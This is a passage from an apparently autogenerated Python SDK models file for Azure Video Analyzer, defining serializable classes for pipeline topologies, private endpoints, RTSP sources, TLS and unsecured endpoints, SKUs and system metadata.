'type': {'readonly': True},
'system_data': {'readonly': True},
'state': {'readonly': True},
'expiration': {'readonly': True},
'error': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'topology_name': {'key': 'properties.topologyName', 'type': 'str'},
'description': {'key': 'properties.description', 'type': 'str'},
'state': {'key': 'properties.state', 'type': 'str'},
'expiration': {'key': 'properties.expiration', 'type': 'iso-8601'},
'error': {'key': 'properties.error', 'type': 'PipelineJobError'},
'parameters': {'key': 'properties.parameters', 'type': '[ParameterDefinition]'},
}
def __init__(
self,
**kwargs
):
super(PipelineJobUpdate, self).__init__(**kwargs)
self.topology_name = kwargs.get('topology_name', None)
self.description = kwargs.get('description', None)
self.state = None
self.expiration = None
self.error = None
self.parameters = kwargs.get('parameters', None)
class PipelineTopology(ProxyResource):
"""Pipeline topology describes the processing steps to be applied when processing content for a particular outcome. The topology should be defined according to the scenario to be achieved and can be reused across many pipeline instances which share the same processing characteristics. For instance, a pipeline topology which captures content from a RTSP camera and archives the content can be reused across many different cameras, as long as the same processing is to be applied across all the cameras. Individual instance properties can be defined through the use of user-defined parameters, which allow for a topology to be parameterized. This allows individual pipelines refer to different values, such as individual cameras' RTSP endpoints and credentials. Overall a topology is composed of the following:
* Parameters: list of user defined parameters that can be references across the topology nodes.
* Sources: list of one or more data sources nodes such as an RTSP source which allows for content to be ingested from cameras.
* Processors: list of nodes which perform data analysis or transformations.
* Sinks: list of one or more data sinks which allow for data to be stored or exported to other destinations.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param kind: Required. Topology kind. Possible values include: "Live", "Batch".
:type kind: str or ~video_analyzer.models.Kind
:param sku: Required. Describes the properties of a SKU.
:type sku: ~video_analyzer.models.Sku
:param description: An optional description of the pipeline topology. It is recommended that
the expected use of the topology to be described here.
:type description: str
:param parameters: List of the topology parameter declarations. Parameters declared here can be
referenced throughout the topology nodes through the use of "${PARAMETER_NAME}" string pattern.
Parameters can have optional default values and can later be defined in individual instances of
the pipeline.
:type parameters: list[~video_analyzer.models.ParameterDeclaration]
:param sources: List of the topology source nodes. Source nodes enable external data to be
ingested by the pipeline.
:type sources: list[~video_analyzer.models.SourceNodeBase]
:param processors: List of the topology processor nodes. Processor nodes enable pipeline data
to be analyzed, processed or transformed.
:type processors: list[~video_analyzer.models.ProcessorNodeBase]
:param sinks: List of the topology sink nodes. Sink nodes allow pipeline data to be stored or
exported.
:type sinks: list[~video_analyzer.models.SinkNodeBase]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'kind': {'required': True},
'sku': {'required': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'kind': {'key': 'kind', 'type': 'str'},
'sku': {'key': 'sku', 'type': 'Sku'},
'description': {'key': 'properties.description', 'type': 'str'},
'parameters': {'key': 'properties.parameters', 'type': '[ParameterDeclaration]'},
'sources': {'key': 'properties.sources', 'type': '[SourceNodeBase]'},
'processors': {'key': 'properties.processors', 'type': '[ProcessorNodeBase]'},
'sinks': {'key': 'properties.sinks', 'type': '[SinkNodeBase]'},
}
def __init__(
self,
**kwargs
):
super(PipelineTopology, self).__init__(**kwargs)
self.kind = kwargs['kind']
self.sku = kwargs['sku']
self.description = kwargs.get('description', None)
self.parameters = kwargs.get('parameters', None)
self.sources = kwargs.get('sources', None)
self.processors = kwargs.get('processors', None)
self.sinks = kwargs.get('sinks', None)
class PipelineTopologyCollection(msrest.serialization.Model):
"""A collection of PipelineTopology items.
:param value: A collection of PipelineTopology items.
:type value: list[~video_analyzer.models.PipelineTopology]
:param next_link: A link to the next page of the collection (when the collection contains too
many results to return in one response).
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[PipelineTopology]'},
'next_link': {'key': '@nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(PipelineTopologyCollection, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
self.next_link = kwargs.get('next_link', None)
class PipelineTopologyUpdate(ProxyResource):
"""Pipeline topology describes the processing steps to be applied when processing content for a particular outcome. The topology should be defined according to the scenario to be achieved and can be reused across many pipeline instances which share the same processing characteristics. For instance, a pipeline topology which captures content from a RTSP camera and archives the content can be reused across many different cameras, as long as the same processing is to be applied across all the cameras. Individual instance properties can be defined through the use of user-defined parameters, which allow for a topology to be parameterized. This allows individual pipelines refer to different values, such as individual cameras' RTSP endpoints and credentials. Overall a topology is composed of the following:
* Parameters: list of user defined parameters that can be references across the topology nodes.
* Sources: list of one or more data sources nodes such as an RTSP source which allows for content to be ingested from cameras.
* Processors: list of nodes which perform data analysis or transformations.
* Sinks: list of one or more data sinks which allow for data to be stored or exported to other destinations.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param kind: Topology kind. Possible values include: "Live", "Batch".
:type kind: str or ~video_analyzer.models.Kind
:param sku: Describes the properties of a SKU.
:type sku: ~video_analyzer.models.Sku
:param description: An optional description of the pipeline topology. It is recommended that
the expected use of the topology to be described here.
:type description: str
:param parameters: List of the topology parameter declarations. Parameters declared here can be
referenced throughout the topology nodes through the use of "${PARAMETER_NAME}" string pattern.
Parameters can have optional default values and can later be defined in individual instances of
the pipeline.
:type parameters: list[~video_analyzer.models.ParameterDeclaration]
:param sources: List of the topology source nodes. Source nodes enable external data to be
ingested by the pipeline.
:type sources: list[~video_analyzer.models.SourceNodeBase]
:param processors: List of the topology processor nodes. Processor nodes enable pipeline data
to be analyzed, processed or transformed.
:type processors: list[~video_analyzer.models.ProcessorNodeBase]
:param sinks: List of the topology sink nodes. Sink nodes allow pipeline data to be stored or
exported.
:type sinks: list[~video_analyzer.models.SinkNodeBase]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'kind': {'key': 'kind', 'type': 'str'},
'sku': {'key': 'sku', 'type': 'Sku'},
'description': {'key': 'properties.description', 'type': 'str'},
'parameters': {'key': 'properties.parameters', 'type': '[ParameterDeclaration]'},
'sources': {'key': 'properties.sources', 'type': '[SourceNodeBase]'},
'processors': {'key': 'properties.processors', 'type': '[ProcessorNodeBase]'},
'sinks': {'key': 'properties.sinks', 'type': '[SinkNodeBase]'},
}
def __init__(
self,
**kwargs
):
super(PipelineTopologyUpdate, self).__init__(**kwargs)
self.kind = kwargs.get('kind', None)
self.sku = kwargs.get('sku', None)
self.description = kwargs.get('description', None)
self.parameters = kwargs.get('parameters', None)
self.sources = kwargs.get('sources', None)
self.processors = kwargs.get('processors', None)
self.sinks = kwargs.get('sinks', None)
class PrivateEndpoint(msrest.serialization.Model):
"""The Private Endpoint resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: The ARM identifier for Private Endpoint.
:vartype id: str
"""
_validation = {
'id': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(PrivateEndpoint, self).__init__(**kwargs)
self.id = None
class PrivateEndpointConnection(Resource):
"""The Private Endpoint Connection resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param private_endpoint: The resource of private end point.
:type private_endpoint: ~video_analyzer.models.PrivateEndpoint
:param private_link_service_connection_state: A collection of information about the state of
the connection between service consumer and provider.
:type private_link_service_connection_state:
~video_analyzer.models.PrivateLinkServiceConnectionState
:ivar provisioning_state: The provisioning state of the private endpoint connection resource.
Possible values include: "Succeeded", "Creating", "Deleting", "Failed".
:vartype provisioning_state: str or
~video_analyzer.models.PrivateEndpointConnectionProvisioningState
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'provisioning_state': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'private_endpoint': {'key': 'properties.privateEndpoint', 'type': 'PrivateEndpoint'},
'private_link_service_connection_state': {'key': 'properties.privateLinkServiceConnectionState', 'type': 'PrivateLinkServiceConnectionState'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(PrivateEndpointConnection, self).__init__(**kwargs)
self.private_endpoint = kwargs.get('private_endpoint', None)
self.private_link_service_connection_state = kwargs.get('private_link_service_connection_state', None)
self.provisioning_state = None
class PrivateEndpointConnectionListResult(msrest.serialization.Model):
"""List of private endpoint connection associated with the specified storage account.
:param value: Array of private endpoint connections.
:type value: list[~video_analyzer.models.PrivateEndpointConnection]
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[PrivateEndpointConnection]'},
}
def __init__(
self,
**kwargs
):
super(PrivateEndpointConnectionListResult, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
class PrivateLinkResource(Resource):
"""A private link resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:ivar group_id: The private link resource group id.
:vartype group_id: str
:ivar required_members: The private link resource required member names.
:vartype required_members: list[str]
:param required_zone_names: The private link resource Private link DNS zone name.
:type required_zone_names: list[str]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'group_id': {'readonly': True},
'required_members': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'group_id': {'key': 'properties.groupId', 'type': 'str'},
'required_members': {'key': 'properties.requiredMembers', 'type': '[str]'},
'required_zone_names': {'key': 'properties.requiredZoneNames', 'type': '[str]'},
}
def __init__(
self,
**kwargs
):
super(PrivateLinkResource, self).__init__(**kwargs)
self.group_id = None
self.required_members = None
self.required_zone_names = kwargs.get('required_zone_names', None)
class PrivateLinkResourceListResult(msrest.serialization.Model):
"""A list of private link resources.
:param value: Array of private link resources.
:type value: list[~video_analyzer.models.PrivateLinkResource]
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[PrivateLinkResource]'},
}
def __init__(
self,
**kwargs
):
super(PrivateLinkResourceListResult, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
class PrivateLinkServiceConnectionState(msrest.serialization.Model):
"""A collection of information about the state of the connection between service consumer and provider.
:param status: Indicates whether the connection has been Approved/Rejected/Removed by the owner
of the service. Possible values include: "Pending", "Approved", "Rejected".
:type status: str or ~video_analyzer.models.PrivateEndpointServiceConnectionStatus
:param description: The reason for approval/rejection of the connection.
:type description: str
:param actions_required: A message indicating if changes on the service provider require any
updates on the consumer.
:type actions_required: str
"""
_attribute_map = {
'status': {'key': 'status', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'actions_required': {'key': 'actionsRequired', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(PrivateLinkServiceConnectionState, self).__init__(**kwargs)
self.status = kwargs.get('status', None)
self.description = kwargs.get('description', None)
self.actions_required = kwargs.get('actions_required', None)
class Properties(msrest.serialization.Model):
"""Metric properties.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar service_specification: The service specifications.
:vartype service_specification: ~video_analyzer.models.ServiceSpecification
"""
_validation = {
'service_specification': {'readonly': True},
}
_attribute_map = {
'service_specification': {'key': 'serviceSpecification', 'type': 'ServiceSpecification'},
}
def __init__(
self,
**kwargs
):
super(Properties, self).__init__(**kwargs)
self.service_specification = None
class ResourceIdentity(msrest.serialization.Model):
"""The user assigned managed identity to use when accessing a resource.
All required parameters must be populated in order to send to Azure.
:param user_assigned_identity: Required. The user assigned managed identity's resource
identifier to use when accessing a resource.
:type user_assigned_identity: str
"""
_validation = {
'user_assigned_identity': {'required': True},
}
_attribute_map = {
'user_assigned_identity': {'key': 'userAssignedIdentity', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ResourceIdentity, self).__init__(**kwargs)
self.user_assigned_identity = kwargs['user_assigned_identity']
class RsaTokenKey(TokenKey):
"""Required validation properties for tokens generated with RSA algorithm.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param kid: Required. JWT token key id. Validation keys are looked up based on the key id
present on the JWT token header.
:type kid: str
:param alg: Required. RSA algorithm to be used: RS256, RS384 or RS512. Possible values include:
"RS256", "RS384", "RS512".
:type alg: str or ~video_analyzer.models.AccessPolicyRsaAlgo
:param n: Required. RSA public key modulus.
:type n: str
:param e: Required. RSA public key exponent.
:type e: str
"""
_validation = {
'type': {'required': True},
'kid': {'required': True},
'alg': {'required': True},
'n': {'required': True},
'e': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'kid': {'key': 'kid', 'type': 'str'},
'alg': {'key': 'alg', 'type': 'str'},
'n': {'key': 'n', 'type': 'str'},
'e': {'key': 'e', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(RsaTokenKey, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.RsaTokenKey' # type: str
self.alg = kwargs['alg']
self.n = kwargs['n']
self.e = kwargs['e']
class SourceNodeBase(NodeBase):
"""Base class for topology source nodes.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: RtspSource, VideoSource.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param name: Required. Node name. Must be unique within the topology.
:type name: str
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.RtspSource': 'RtspSource', '#Microsoft.VideoAnalyzer.VideoSource': 'VideoSource'}
}
def __init__(
self,
**kwargs
):
super(SourceNodeBase, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.SourceNodeBase' # type: str
class RtspSource(SourceNodeBase):
"""RTSP source allows for media from an RTSP camera or generic RTSP server to be ingested into a pipeline.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param name: Required. Node name. Must be unique within the topology.
:type name: str
:param transport: Network transport utilized by the RTSP and RTP exchange: TCP or HTTP. When
using TCP, the RTP packets are interleaved on the TCP RTSP connection. When using HTTP, the
RTSP messages are exchanged through long lived HTTP connections, and the RTP packages are
interleaved in the HTTP connections alongside the RTSP messages. Possible values include:
"Http", "Tcp".
:type transport: str or ~video_analyzer.models.RtspTransport
:param endpoint: Required. RTSP endpoint information for Video Analyzer to connect to. This
contains the required information for Video Analyzer to connect to RTSP cameras and/or generic
RTSP servers.
:type endpoint: ~video_analyzer.models.EndpointBase
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
'endpoint': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'transport': {'key': 'transport', 'type': 'str'},
'endpoint': {'key': 'endpoint', 'type': 'EndpointBase'},
}
def __init__(
self,
**kwargs
):
super(RtspSource, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.RtspSource' # type: str
self.transport = kwargs.get('transport', None)
self.endpoint = kwargs['endpoint']
class TunnelBase(msrest.serialization.Model):
"""Base class for tunnel objects.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: SecureIotDeviceRemoteTunnel.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.SecureIotDeviceRemoteTunnel': 'SecureIotDeviceRemoteTunnel'}
}
def __init__(
self,
**kwargs
):
super(TunnelBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
class SecureIotDeviceRemoteTunnel(TunnelBase):
"""A remote tunnel securely established using IoT Hub device information.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param iot_hub_name: Required. Name of the IoT Hub.
:type iot_hub_name: str
:param device_id: Required. The IoT device id to use when establishing the remote tunnel. This
string is case-sensitive.
:type device_id: str
"""
_validation = {
'type': {'required': True},
'iot_hub_name': {'required': True},
'device_id': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'iot_hub_name': {'key': 'iotHubName', 'type': 'str'},
'device_id': {'key': 'deviceId', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(SecureIotDeviceRemoteTunnel, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.SecureIotDeviceRemoteTunnel' # type: str
self.iot_hub_name = kwargs['iot_hub_name']
self.device_id = kwargs['device_id']
class ServiceSpecification(msrest.serialization.Model):
"""The service metric specifications.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar log_specifications: List of log specifications.
:vartype log_specifications: list[~video_analyzer.models.LogSpecification]
:ivar metric_specifications: List of metric specifications.
:vartype metric_specifications: list[~video_analyzer.models.MetricSpecification]
"""
_validation = {
'log_specifications': {'readonly': True},
'metric_specifications': {'readonly': True},
}
_attribute_map = {
'log_specifications': {'key': 'logSpecifications', 'type': '[LogSpecification]'},
'metric_specifications': {'key': 'metricSpecifications', 'type': '[MetricSpecification]'},
}
def __init__(
self,
**kwargs
):
super(ServiceSpecification, self).__init__(**kwargs)
self.log_specifications = None
self.metric_specifications = None
class SinkNodeBase(NodeBase):
"""Base class for topology sink nodes.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: VideoSink.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param name: Required. Node name. Must be unique within the topology.
:type name: str
:param inputs: Required. An array of upstream node references within the topology to be used as
inputs for this node.
:type inputs: list[~video_analyzer.models.NodeInput]
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
'inputs': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'inputs': {'key': 'inputs', 'type': '[NodeInput]'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.VideoSink': 'VideoSink'}
}
def __init__(
self,
**kwargs
):
super(SinkNodeBase, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.SinkNodeBase' # type: str
self.inputs = kwargs['inputs']
class Sku(msrest.serialization.Model):
"""The SKU details.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param name: Required. The SKU name. Possible values include: "Live_S1", "Batch_S1".
:type name: str or ~video_analyzer.models.SkuName
:ivar tier: The SKU tier. Possible values include: "Standard".
:vartype tier: str or ~video_analyzer.models.SkuTier
"""
_validation = {
'name': {'required': True},
'tier': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'tier': {'key': 'tier', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Sku, self).__init__(**kwargs)
self.name = kwargs['name']
self.tier = None
class StorageAccount(msrest.serialization.Model):
"""The details about the associated storage account.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param id: Required. The ID of the storage account resource. Video Analyzer relies on tables,
queues, and blobs. The primary storage account must be a Standard Storage account (either
Microsoft.ClassicStorage or Microsoft.Storage).
:type id: str
:param identity: A managed identity that Video Analyzer will use to access the storage account.
:type identity: ~video_analyzer.models.ResourceIdentity
:ivar status: The current status of the storage account mapping.
:vartype status: str
"""
_validation = {
'id': {'required': True},
'status': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'identity': {'key': 'identity', 'type': 'ResourceIdentity'},
'status': {'key': 'status', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(StorageAccount, self).__init__(**kwargs)
self.id = kwargs['id']
self.identity = kwargs.get('identity', None)
self.status = None
class SystemData(msrest.serialization.Model):
"""Metadata pertaining to creation and last modification of the resource.
:param created_by: The identity that created the resource.
:type created_by: str
:param created_by_type: The type of identity that created the resource. Possible values
include: "User", "Application", "ManagedIdentity", "Key".
:type created_by_type: str or ~video_analyzer.models.CreatedByType
:param created_at: The timestamp of resource creation (UTC).
:type created_at: ~datetime.datetime
:param last_modified_by: The identity that last modified the resource.
:type last_modified_by: str
:param last_modified_by_type: The type of identity that last modified the resource. Possible
values include: "User", "Application", "ManagedIdentity", "Key".
:type last_modified_by_type: str or ~video_analyzer.models.CreatedByType
:param last_modified_at: The timestamp of resource last modification (UTC).
:type last_modified_at: ~datetime.datetime
"""
_attribute_map = {
'created_by': {'key': 'createdBy', 'type': 'str'},
'created_by_type': {'key': 'createdByType', 'type': 'str'},
'created_at': {'key': 'createdAt', 'type': 'iso-8601'},
'last_modified_by': {'key': 'lastModifiedBy', 'type': 'str'},
'last_modified_by_type': {'key': 'lastModifiedByType', 'type': 'str'},
'last_modified_at': {'key': 'lastModifiedAt', 'type': 'iso-8601'},
}
def __init__(
self,
**kwargs
):
super(SystemData, self).__init__(**kwargs)
self.created_by = kwargs.get('created_by', None)
self.created_by_type = kwargs.get('created_by_type', None)
self.created_at = kwargs.get('created_at', None)
self.last_modified_by = kwargs.get('last_modified_by', None)
self.last_modified_by_type = kwargs.get('last_modified_by_type', None)
self.last_modified_at = kwargs.get('last_modified_at', None)
class TimeSequenceBase(msrest.serialization.Model):
"""A sequence of datetime ranges as a string.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: VideoSequenceAbsoluteTimeMarkers.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.VideoSequenceAbsoluteTimeMarkers': 'VideoSequenceAbsoluteTimeMarkers'}
}
def __init__(
self,
**kwargs
):
super(TimeSequenceBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
class TlsEndpoint(EndpointBase):
"""TLS endpoint describes an endpoint that the pipeline can connect to over TLS transport (data is encrypted in transit).
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param credentials: Required. Credentials to be presented to the endpoint.
:type credentials: ~video_analyzer.models.CredentialsBase
:param url: Required. The endpoint URL for Video Analyzer to connect to.
:type url: str
:param tunnel: Describes the tunnel through which Video Analyzer can connect to the endpoint
URL. This is an optional property, typically used when the endpoint is behind a firewall.
:type tunnel: ~video_analyzer.models.TunnelBase
:param trusted_certificates: List of trusted certificate authorities when authenticating a TLS
connection. A null list designates that Azure Video Analyzer's list of trusted authorities
should be used.
:type trusted_certificates: ~video_analyzer.models.CertificateSource
:param validation_options: Validation options to use when authenticating a TLS connection. By
default, strict validation is used.
:type validation_options: ~video_analyzer.models.TlsValidationOptions
"""
_validation = {
'type': {'required': True},
'credentials': {'required': True},
'url': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'credentials': {'key': 'credentials', 'type': 'CredentialsBase'},
'url': {'key': 'url', 'type': 'str'},
'tunnel': {'key': 'tunnel', 'type': 'TunnelBase'},
'trusted_certificates': {'key': 'trustedCertificates', 'type': 'CertificateSource'},
'validation_options': {'key': 'validationOptions', 'type': 'TlsValidationOptions'},
}
def __init__(
self,
**kwargs
):
super(TlsEndpoint, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.TlsEndpoint' # type: str
self.trusted_certificates = kwargs.get('trusted_certificates', None)
self.validation_options = kwargs.get('validation_options', None)
class TlsValidationOptions(msrest.serialization.Model):
"""Options for controlling the validation of TLS endpoints.
:param ignore_hostname: When set to 'true' causes the certificate subject name validation to be
skipped. Default is 'false'.
:type ignore_hostname: str
:param ignore_signature: When set to 'true' causes the certificate chain trust validation to be
skipped. Default is 'false'.
:type ignore_signature: str
"""
_attribute_map = {
'ignore_hostname': {'key': 'ignoreHostname', 'type': 'str'},
'ignore_signature': {'key': 'ignoreSignature', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(TlsValidationOptions, self).__init__(**kwargs)
self.ignore_hostname = kwargs.get('ignore_hostname', None)
self.ignore_signature = kwargs.get('ignore_signature', None)
class TokenClaim(msrest.serialization.Model):
"""Properties for expected token claims.
All required parameters must be populated in order to send to Azure.
:param name: Required. Name of the claim which must be present on the token.
:type name: str
:param value: Required. Expected value of the claim to be present on the token.
:type value: str
"""
_validation = {
'name': {'required': True},
'value': {'required': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'value': {'key': 'value', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(TokenClaim, self).__init__(**kwargs)
self.name = kwargs['name']
self.value = kwargs['value']
class TrackedResource(Resource):
"""The resource model definition for an Azure Resource Manager tracked top level resource which has 'tags' and a 'location'.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param tags: A set of tags. Resource tags.
:type tags: dict[str, str]
:param location: Required. The geo-location where the resource lives.
:type location: str
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'location': {'required': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'tags': {'key': 'tags', 'type': '{str}'},
'location': {'key': 'location', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(TrackedResource, self).__init__(**kwargs)
self.tags = kwargs.get('tags', None)
self.location = kwargs['location']
class UnsecuredEndpoint(EndpointBase):
"""Unsecured endpoint describes an endpoint that the pipeline can connect to over clear transport (no encryption in transit).
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param credentials: Required. Credentials to be presented to the endpoint.
:type credentials: ~video_analyzer.models.CredentialsBase
:param url: Required. The endpoint URL for Video Analyzer to connect to.
:type url: str
:param tunnel: Describes the tunnel through which Video Analyzer can connect to the endpoint
URL. This is an optional property, typically used when the endpoint is behind a firewall.
:type tunnel: ~video_analyzer.models.TunnelBase
"""
_validation = {
'type': {'required': True},
'credentials': {'required': True},
'url': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'credentials': {'key': 'credentials', 'type': 'CredentialsBase'},
'url': {'key': 'url', 'type': 'str'},
'tunnel': {'key': 'tunnel', 'type': 'TunnelBase'},
}
def __init__(
self,
**kwargs
):
super(UnsecuredEndpoint, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.UnsecuredEndpoint' # type: str
class UserAssignedManagedIdentity(msrest.serialization.Model):
"""The details of the user assigned managed identity used by the Video Analyzer resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar client_id: The client ID.
:vartype client_id: str
